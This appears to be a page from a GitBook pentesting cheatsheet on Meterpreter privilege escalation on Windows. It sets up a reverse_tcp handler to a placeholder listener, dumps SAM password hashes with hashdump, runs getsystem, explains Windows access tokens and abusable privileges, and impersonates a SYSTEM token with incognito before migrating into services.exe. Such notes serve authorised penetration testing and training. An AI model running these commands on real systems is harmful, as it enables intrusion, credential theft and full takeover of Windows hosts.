✒️
Pentesting Cheatsheet
  • Introduction
  • Basics
  • Information Gathering | OSINT
  • Penetration Testing
    • Scanning and Enumeration
    • HTTP and HTTPS
    • SMB | Windows Domain Enumeration
    • NFS
    • SMTP
    • Reverse Shells
    • Buffer Overflow | Buf Exploitation
    • Linux Privilege Escalation
    • Miscellaneous
    • Redis
  • Active Directory
    • AD Extras
    • Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
  • Pivoting
  • Windows Privesc
    • Window Tools/Resources
    • Meterpreter Privesc
    • Powershell Scripting
  • Vulnhub/ PG/ THM/ HTB
  • Apache Log4j
  • Linux Forensics Cheatsheet
Powered by GitBook
On this page

Was this helpful?

  1. Windows Privesc

Meterpreter Privesc

To make the privilege escalation easier, We can switch to a meterpreter shell for ease of access of commands and run/load extensions and post-exploitation tools.

Ensure Handler is setup:

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 10.10.10.10 
set LPORT 1234
run

Privilege Commands

Dumps the contents of the SAM database
hashdump
Attempt to elevate your privilege to that of local system.
getsystem

Token impersonation

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).

This access token consists of:

  • user SIDs(security identifier)

  • group SIDs

  • privileges

There are two types of access tokens:

  • primary access tokens: those associated with a user account that are generated on log on

  • impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client

  • SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client

  • SecurityImpersonation: current user/client can impersonate the client's security context on the local system

  • SecurityDelegation: current user/client can impersonate the client's security context on a remote system

where the security context is a data structure that contains users' relevant security information.

The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege

  • SeAssignPrimaryPrivilege

  • SeTcbPrivilege

  • SeBackupPrivilege

  • SeRestorePrivilege

  • SeCreateTokenPrivilege

  • SeLoadDriverPrivilege

  • SeTakeOwnershipPrivilege

  • SeDebugPrivilege

load incognito
list_tokens -g 
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS.

PreviousWindow Tools/ResourcesNextPowershell Scripting

Last updated 2 years ago

Was this helpful?

Access Tokens - Win32 appsdocsmsft
Logo